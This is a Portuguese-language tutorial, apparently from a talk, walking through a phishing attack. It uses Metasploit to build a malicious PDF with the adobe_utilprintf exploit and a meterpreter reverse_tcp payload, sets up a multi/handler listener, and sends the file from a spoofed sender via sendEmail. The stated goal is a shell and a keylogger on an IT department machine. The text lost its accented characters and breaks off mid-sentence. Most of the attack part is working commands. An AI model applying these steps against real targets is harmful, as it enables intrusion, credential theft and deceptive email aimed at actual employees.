Académique Documents
Professionnel Documents
Culture Documents
. No mundo da segurana, a engenharia social tornou-se um vetor de ataque cada vez mais utilizado. Mesmo que mude as tecnologias, uma coisa que parece permanecer a falta de segurana com as pessoas. Devido a isso, a engenharia social se tornou o principal tema da segurana no mundo de hoje. Nesse cenrio o atacante fez uma grande coleta de informaes usando ferramentas como o Metasploit Framework, Maltego e outras ferramentas para coletar endereos de e-mail e informaes dos usurios com o objetivo de lanar um ataque de engenharia social do lado do cliente sobre a empresa.
itdept@victim.com Queremos ganhar shell no computador do departamentos de TI e executar um keylogger para obter senhas ou quaisquer outras informaes teis.
Vamos comeamos carregando nosso msfconsole. Depois de carregado iremos criar um PDF malicioso que vai dar
vtima uma sensao de segurana em abri-lo. http://www.social-engineer.org Para fazer isso, ele deve parecer legitimo, ter um ttulo realista, e no ser pego por anti-vrus ou outro software de segurana qualquer.
aplicativo no executa verificaes de limite adequado sobre dados fornecidos pelo usurio.
Um atacante pode explorar esta questo para executar cdigo arbitrrio
com os privilgios do usurio que est executando a aplicao ou falha do pedido, negando servio aos usurios legtimos.
Ento, vamos comear criando nosso arquivo PDF malicioso para uso
neste ataque.
BeastComputers-UpgradeInstructions.pdf #msf> exploit (adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp #msf> exploit (adobe_utilprintf) > set LHOST 192.168.8.128 #msf> exploit (adobe_utilprintf) > set LPORT 4455 #msf> exploit (adobe_utilprintf) > show options
J que temos todas as opes setadas hora de definir a forma como ns queremos, executar o "exploit" para criar o nosso arquivo malicioso.
Assim, podemos ver que o nosso arquivo PDF foi criado em um subdiretrio de onde estamos. Agora s copi-lo para o nosso diretrio /tmp ou outro de sua preferncia. Antes de enviar o arquivo malicioso para nossa vtima preciso configurar um ouvinte para receber a conexo remota. Vamos usar o msfconsole para montar o nosso ouvinte multi handler.
#msf> use exploit/multi/handler #msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp #msf exploit (handler) > set LPORT 4455 #msf exploit (handler) > set LHOST 192.168.8.128 #msf exploit (handler) > exploit Agora que o nosso ouvinte est escutando para receber o seu payload malicioso, temos que entregar este payload para a vtima e como j temos o endereo de email do departamento de TI, podemos utilizar um script til do sendEmail para entregar o payload para a vtima ou um dos programas j apresentados nessa palestra. Podemos anexar o PDF malicioso, utilize qualquer servidor SMTP que quiser, e escreva um e-mail bastante convincente de qualquer endereo que quiser.
Como podemos ver aqui, o script que nos permite colocar qualquer endereo FROM (-f), qualquer TO (-t), qualquer servidor SMTP (-s), bem como Ttulos (-u) e nosso arquivo malicioso (-a). Aps fazermos tudo isso s pressionamos enter e digitar qualquer mensagem que quisermos, em seguida, pressionar CTRL + D e ser enviado o email para a vtima. Agora s aguardar que um estagirio do departamento de TI abra o email, salve em uma pasta qualquer, passe o antivrus, como o antivrus no encontrar nada de anormal ele tem mais de 50% de chance de executar.
Ao clicar no arquivo o Adobe abre e mostra uma janela cinzenta, que nunca revela o contedo do PDF...